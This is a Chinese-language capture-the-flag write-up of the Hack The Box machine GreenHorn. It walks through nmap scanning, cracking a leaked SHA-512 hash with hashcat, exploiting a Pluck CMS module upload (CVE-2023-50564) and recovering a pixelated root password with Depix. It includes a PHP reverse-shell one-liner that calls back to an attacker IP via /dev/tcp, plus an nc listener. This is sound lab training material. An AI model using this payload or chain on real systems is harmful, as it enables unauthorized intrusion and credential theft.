HTB-GreenHorn 靶机笔记

news/2024/11/15 15:59:26/文章来源:https://www.cnblogs.com/LINGX5/p/18425269

GreenHorn 靶机笔记

概述

GreenHorn 是 HTB 上的一个 linux easy 难度的靶机,主要是通过信息搜集和代码审计能不能找到对我们有用的信息。

靶机地址:https://app.hackthebox.com/machines/GreenHorn

一丶 nmap 扫描

1)端口扫描

-sT 以 TCP 全连接扫描,--min-rate 10000 以最低 10000 速率进行扫描,-p-进行全端口扫描,-o ports 结果输出到 ports 文件中

nmap -sT --min-rate 10000 -p- 10.10.11.25 -o portsStarting Nmap 7.93 ( https://nmap.org ) at 2024-08-17 03:55 EDT
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 32.56% done; ETC: 03:55 (0:00:27 remaining)
Warning: 10.10.11.25 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.25
Host is up (0.26s latency).
Not shown: 33635 closed tcp ports (conn-refused), 31897 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  pppNmap done: 1 IP address (1 host up) scanned in 147.73 seconds

2)详细信息扫描

以-sT 以 tcp, -sV 探测版本, -sC 以默认脚本 扫描端口 $ports,-O 探测操作系统版本,输出到 details 文件中

nmap -sT -sV -sC -p22,80,3000 10.10.11.25 -o details Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-17 04:04 EDT                                                                    
Nmap scan report for 10.10.11.25             
Host is up (0.43s latency).                                     
PORT     STATE SERVICE VERSION               
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)                 
| ssh-hostkey:
|   256 57d6928a7244841729eb5cc9636afefd (ECDSA)           
|_  256 40ea17b1b6c53f4256674a3cee75232f (ED25519)        
80/tcp   open  http    nginx 1.18.0 (Ubuntu)               
|_http-server-header: nginx/1.18.0 (Ubuntu)           
|_http-title: Did not follow redirect to http://greenhorn.htb/                 
3000/tcp open  ppp?             
| fingerprint-strings:                 
|   GenericLines, Help, RTSPRequest:     
|     HTTP/1.1 400 Bad Request            
|     Content-Type: text/plain; charset=utf-8        
|     Connection: close                            
|     Request                
|   GetRequest:                          
|     HTTP/1.0 200 OK                                   
|     Cache-Control: max-age=0, private, must-revalidate, no-transform       
|     Content-Type: text/html; charset=utf-8           
|     Set-Cookie: i_like_gitea=ee70815cf933490f; Path=/; HttpOnly; SameSite=Lax          
|     Set-Cookie: _csrf=cxvY7yNHIOWsTQ38C0zH-zadPw46MTcyMzg4MTg4ODM0MTc3MjUyOA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax      
|     X-Frame-Options: SAMEORIGIN                   
|     Date: Sat, 17 Aug 2024 08:04:48 GMT                               
|     <!DOCTYPE html>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.28 seconds

3)默认漏洞脚本扫描

nmap --script=vuln 10.10.11.25 -o vuln     Nmap scan report for 10.10.11.25
Host is up (1.8s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3000/tcp open  ppp
8000/tcp open  http-alt

详细信息扫描看到 http-title: Did not follow redirect to http://greenhorn.htb/ 要去 /etc/hosts 文件绑定域名和 ip

10.10.11.25     greenhorn.htb

image-20240817161543747

写进去就可以访问 web 页面了

二、web 渗透

1)80 端口

访问

http://greenhorn.htb
image-20240817162117378

看到是一个 pluck 的 cms,admin 也是可以点击的。点击进去

image-20240817162226884

需要密码,也给出了 pluck 的版本是 4.7.18

google 搜索大法找到:Pluck 安全漏洞(CVE-2023-50564)

好了,我们现在知道等了进去就可以利用文件上传反弹 shell 了 但我们要怎么登陆呢,没有密码啊

2)3000 端口

image-20240817163107217

我们可以注册,登陆进去看看

image-20240817163305038

发现网站源码,看看有没有什么密码的信息,我们要进入 pluck 的后台才有机会获得立足点

通过审计

login.php 看到校验

image-20240817164538094

image-20240817164901133

pass.php 中发现 ww 变量

刚才也看到了他是 sha512 hash 算法加密的,我们复制出来用 hashcat 破解

  • -a 设定密码破解模式
  • -m 设定加密类型
hashcat -a 0 -m 1700 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163' /usr/share/wordlists/rockyou.txt 
d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1

看到密码

iloveyou1

登陆 80 端口的后台服务

image-20240817170341065

三、获得立足点

在 options 里我们选择 mange modules 里的 install a module

image-20240817170200025

我们需要去找一个 php 的 zip 压缩包

准备一句话木马

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.21/4444 0>&1' "); ?>
zip rev.zip rev.php 

上传

image-20240922132444988

本地监听端口

sudo rlwrap nc -lvp 4444

image-20240922132951179

看到成功获得立足点

四、提权到 root

我们获得了 www-data 的权限,去机器的家目录下看看有哪些用户

www-data@greenhorn:/home$ ls
git
junior

看到 gitjunior 用户,现用之前获得的密码 iloveyou1 碰撞一下这两个用户的 ssh

image-20240922135320803

成功拿到 junior 的 shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
junior@greenhorn:/var/www/html/pluck$

image-20240922135706740

看到 Using OpenVAS.pdf 文件

开启一个 python 的 http 协议

junior@greenhorn:~$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

kali 中执行

wget http://greenhorn.htb:8000/'Using OpenVAS.pdf' 

image-20240922140134183

下载成功,重命名

mv 'Using OpenVAS.pdf' greenhorn.pdf
image-20240922140336940

打开 pdf,看到密码被打上了马赛克,分析内容,这个密码应该就是提取 root 的关键

sudo apt-get install poppler-utils
pdfimages greenhorn.pdf ./root

用到 depix: https://github.com/spipm/Depix 修复像素

python depix.py -p ../root-000.ppm -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o ../root_pass.png

image-20240922142609310

可以看到密码

sudo ssh root@greenhorn.htb

成功获得root权限

image-20240922143523935

总结

  • 通过nmap扫描发现目标开启了22,80,3000端口,在3000端口的版本控制平台注册账户,看到了目标系统的源码,从而拿到了80端口http服务的凭证
  • 通过利用Pluck 安全漏洞(CVE-2023-50564)成功拿到www-data的shell。
  • 利用相同的口令凭证获得了用户junior的权限,在家目录下看到了一个pdf文件,进行像素修复,拿到了root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/801511.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ABBAC900F学习笔记330:用户权限管理、登陆注销事件记录

某浪博客又抽风了,莫名其妙的将访问量清零了,这是赶人走的意思吧? 我把那边的内容搬到这里吧,万一哪天那边关张了,辛辛苦苦的学习笔记就没了。 原博客地址:ABBAC900F学习笔记330:用户权限管理、登陆注销事件记录_来自金沙江的小鱼_新浪博客 (sina.com.cn) 现场有几套ABB…

常佳鑫第一次作业

这个作业属于哪个课程 https://edu.cnblogs.com/campus/zjlg/rjjc这个作业的目标 完成一篇自我介绍随笔的编写,同时熟悉并掌握Markdown的基本语法姓名-学号 常佳鑫-2022329301071自我介绍 个人基本信息与兴趣爱好基本信息姓名 常佳鑫 专业 自动化 籍贯 河南南阳兴趣爱好羽毛球…

[Spring]过滤器

过滤器Filter作为Java三大器之一,在Java Web的使用中有很高的地位。所谓过滤器,就是实现了javax.servlet.Filter接口的服务器端程序。 Filter有如下几个用处:在HttpServletRequest到达Servlet之前,拦截客户的HttpServletRequest。 根据需要检查HttpServletRequest,也可以修…

使用 GitHub Actions Pages 托管 Honkit 发布的网站

使用 GitHub Actions & Pages 托管 Honkit 发布的网站 Created: 2024-09-22T13:48+08:00 Published: 2024-09-22T14:28+08:00 Category: DevOps 作为张雨生的骨灰级粉丝,我一直想把雨生的资料尽可能地收集起来,用网站或者电子书的形式发布。 一番查找后,我选择了 honkit…

MySQL 用户与权限 C连接与使用

目录用户用户管理查询所有用户查看当前用户查看当前连接数创建用户删除用户修改密码规则查看规则/策略规则说明临时设置持久设置修改密码权限数据库提供的 权限列表查看权限给用户授权回收用户权限使用C语言连接库的安装C APImysql_initmysql_real_connectmysql_closemysql_que…

如果防止feign的超时调用造成多次扣减库存

问题:订单服务在通过feign调用库存服务进行库存扣减的时候,我们知道feign是有超时重试机制的。当出现feign超时,或者网络抖动的时候,订单服务以为上次调用没有成功,即使实际上调用成功了,还是会再次调用。库存服务无法区分是否为同一个操作,导致 相同操作被…

[Spring]拦截器

Interceptor 介绍拦截器(Interceptor)同 Filter 过滤器一样,它俩都是面向切面编程——AOP 的具体实现(AOP切面编程只是一种编程思想而已)。 你可以使用 Interceptor 来执行某些任务,例如在 Controller 处理请求之前编写日志,添加或更新配置...... 在 Spring中,当请求发送…

win10x64位+nmake编译geos3.7.1

说明:使用nmake进行编译,最新的geos3.13似乎已经不能用nmake进行编译了,不过3.7.1已经够用了。 1、 解压geos-3.7.1,定位到根目录下的namke.opt文件,这个文件控制着nmake编译的一些参数。 2、 打开nmake.opt,找到如下片段: ###########################################…

Nuxt Kit API :路径解析工具

title: Nuxt Kit API :路径解析工具 date: 2024/9/22 updated: 2024/9/22 author: cmdragon excerpt: 摘要:本文介绍了Nuxt Kit中用于解析路径的API工具,包括resolvePath、resolveAlias、findPath和createResolver。这些工具助力开发者处理模块路径、别名、文件扩展名,提…

使用GPU 加速 Polars:高效解决大规模数据问题

Polars 最近新开发了一个可以支持 GPU 加速计算的执行引擎。这个引擎可以对超过 100GB 的数据进行交互式操作能。本文将详细讨论 Polars 中DF的概念、GPU 加速如何与 Polars DF协同工作,以及使用新的 CUDA 驱动执行引擎可能带来的性能提升。 https://avoid.overfit.cn/post/b…

我的网站集成ElasticSearch初体验

最近,我给我的网站(https://www.xiandanplay.com/)尝试集成了一下es来实现我的一个搜索功能,因为这个是我第一次了解运用elastic,所以如果有不对的地方,大家可以指出来,话不多说,先看看我的一个大致流程 这里我采用的sdk的版本是Elastic.Clients.Elasticsearch, Ver…

Flipper Zero极客的便携式多功能工具设备

官网:Flipper Zero — 极客的便携式多功能工具设备 Flipper Zero是近两年比较热门的硬件工具,官方固件主要涵盖的功能为Sub-Ghz,125kHz,NFC,红外。 基本信息资料都可以在官方网站找到比较详细的文档解释。本篇主要是一个基础入门,这系列也是给自己学习此硬件一个上手研究…